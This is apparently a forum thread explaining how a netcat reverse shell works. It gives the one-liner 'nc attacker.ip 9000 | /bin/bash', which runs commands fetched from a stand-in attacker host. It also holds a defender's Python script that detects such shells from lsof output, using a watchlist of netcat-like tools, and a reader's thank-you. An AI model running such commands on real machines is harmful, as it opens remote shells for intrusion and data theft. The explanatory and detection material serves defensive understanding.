You can create a reverse shell with just netcat. On your victim machine, where you can run a command but not necessarily listen on a port, you can run something like:

    nc attacker.ip 9000 | /bin/bash

This will reach out to the attacker controlled machine and run an arbitrary payload hosted there. A simple payload would be opening a reverse shell to the attacker controlled machine from the victim. Because it's an outgoing connection, it's less likely to be blocked by a firewall.

The reverse shell gives you further access to the victim machine and can be entirely scripted. You can then use additional exploits for privilege elevation or just pilfer whatever you've got access to.

Note this is a super simple demonstration of the concept.
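
A defender-side check for the pattern described above, added here as an example and not part of the thread: it parses constructed `lsof -nP` style rows and flags a shell whose stdio is a TCP socket, or a shell whose stdin pipe is fed by a netcat-like process holding an established connection (the `nc ... | /bin/bash` case). The process names, PIDs, pipe inodes and addresses in the sample are made up, and the `SHELLS`/`NETTOOLS` sets are an assumption about which binaries to watch.

```python
import re
from collections import defaultdict
# Constructed `lsof -nP` style rows (made-up PIDs, inodes and addresses), not from the thread.
SAMPLE = """\
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
nc      4242 www  1w  FIFO 0,12  0t0 88111 pipe
nc      4242 www  3u  IPv4 91234 0t0 TCP   10.0.0.5:43210->203.0.113.7:9000 (ESTABLISHED)
bash    4243 www  0r  FIFO 0,12  0t0 88111 pipe
bash    4244 www  0u  IPv4 91300 0t0 TCP   10.0.0.5:50001->203.0.113.7:4444 (ESTABLISHED)
bash    4244 www  1u  IPv4 91300 0t0 TCP   10.0.0.5:50001->203.0.113.7:4444 (ESTABLISHED)
sshd    900  root 3u  IPv4 70000 0t0 TCP   10.0.0.5:22->10.0.0.9:51000 (ESTABLISHED)
bash    4300 www  0u  CHR  136,3 0t0 6     /dev/pts/3
"""
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
NETTOOLS = {"nc", "ncat", "netcat", "socat"}

def parse(text):
    rows = []
    for line in text.splitlines()[1:]:      # skip header; NAME may contain spaces, so max 9 fields
        parts = line.split(None, 8)
        if len(parts) == 9:
            cmd, pid, _user, fd, typ, _dev, _size, node, name = parts
            rows.append({"cmd": cmd, "pid": int(pid), "fd": fd, "typ": typ, "node": node, "name": name})
    return rows

def fdnum(fd):                              # '0u' -> 0, '3u' -> 3, 'cwd' -> None
    m = re.match(r"\d+", fd)
    return int(m.group()) if m else None

def find_reverse_shells(rows):
    by_pid = defaultdict(list)              # returns sorted (pid, reason) pairs
    for r in rows:
        by_pid[r["pid"]].append(r)
    is_sock = lambda r: r["typ"] in ("IPv4", "IPv6")
    # Pipe inodes a shell reads as stdin: inode -> (shell pid, shell name).
    shell_stdin = {r["node"]: (r["pid"], r["cmd"]) for r in rows
                   if r["cmd"] in SHELLS and fdnum(r["fd"]) == 0 and r["typ"] == "FIFO"}
    findings = []
    for pid, fds in by_pid.items():
        cmd = fds[0]["cmd"]
        # Heuristic 1: a shell with a TCP socket directly on stdin/stdout/stderr.
        if cmd in SHELLS and any(is_sock(r) and fdnum(r["fd"]) in (0, 1, 2) for r in fds):
            findings.append((pid, f"{cmd} has a network socket on stdio"))
        # Heuristic 2: a netcat-like tool holding an ESTABLISHED connection whose stdout pipe is a shell's stdin.
        if cmd in NETTOOLS and any(is_sock(r) and "ESTABLISHED" in r["name"] for r in fds):
            for r in fds:
                if fdnum(r["fd"]) == 1 and r["typ"] == "FIFO" and r["node"] in shell_stdin:
                    spid, scmd = shell_stdin[r["node"]]
                    findings.append((spid, f"{scmd} stdin fed by {cmd} (pid {pid}) with a TCP connection"))
    return sorted(findings)
```

On a live box, feed it the output of `lsof -nP` instead of `SAMPLE`; the interactive `bash` on a pty and the legitimate `sshd` socket are deliberately left in the sample to show they are not flagged.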

Thanks for the reply, that was just the level of explanation I was looking for. It wouldn't have even dawned on me to do it that way. I'm obviously not a security researcher.